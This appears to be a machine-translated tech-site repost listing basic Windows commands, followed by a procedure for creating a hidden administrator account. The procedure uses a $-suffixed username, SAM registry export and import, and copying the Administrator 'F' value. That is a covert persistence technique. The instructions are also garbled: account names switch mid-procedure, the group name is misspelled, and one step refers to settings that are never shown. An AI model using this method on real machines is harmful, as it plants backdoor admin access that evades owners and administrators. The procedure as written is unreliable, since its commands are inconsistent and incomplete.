In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-01-21 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Internet Technology >
Share
Shulou(Shulou.com)06/02 Report--
In this issue, the editor will bring you about the common commands of window and how to add hidden accounts. The article is rich in content and analyzes and narrates it from a professional point of view. I hope you can get something after reading this article.
I. Common commands
1. Check the system version: ver
2. Check the hostname: hostname
3. View the network configuration: ipconfig/all
4. View the user: net user
5. View the open port: netstat-ano
6. Open the registry: regedit
7. Open the time viewer: eventvwr.msc
8. Open the system service: services.msc
9. Open the Group Policy Editor: gpedit.msc
10. Open the local security policy: secpol.msc
11. Open local users and groups: lusrmgr.msc
II. Account-related orders
1. View the details of the account aiyou: net user aiyou
2. Create an empty password account aiyou:net user aiyou / add
3. Delete the empty password account aiyou:net user aiyou / del
4. Add aiyou to the administrator group: net localgroup administrator aiyou / add
5. Delete aiyou from the administrator group: net localgroup administrator aiyou / del
6. Enable aiyou account: net user aiyou / active:yes
7. Close the aiyou account: net user aiyou / active:no
8. Whoami command:
Third, establish a hidden account
1. Add a hidden account
Net user aiyou123 $aiyou123 / add
2. Add to the administrators group
Net localgroup administrator test$ / add
3. Regedit, open the registry and expand HKEY_LOCAL_MACHINE\ SAM\ SAM. There is no content by default. Right-click SAM, and make the following settings
4. Restart the registry, open HKEY_LOCAL_MACHINE\ SAM\ SAM\ Domains\ Account\ Users\ Names\ aiyou123 $, and view the type as 0x3eb.
5. Open HKEY_LOCAL_MACHINE\ SAM\ SAM\ Domains\ Account\ Users and export the two registries in it.
6. Delete aiyou123 $and restart the registry again
Net user aiyou123 $/ del
7. Import the two registry contents again, and drag the two exported reg files back to the original location.
8. Find and copy the F value in administrator to aiyou123 $
9. View the user's net user
10. Switch user login or logout, and enter the login account and password to log in.
The above are the common window commands shared by the editor and how to add hidden accounts. If you happen to have similar doubts, please refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.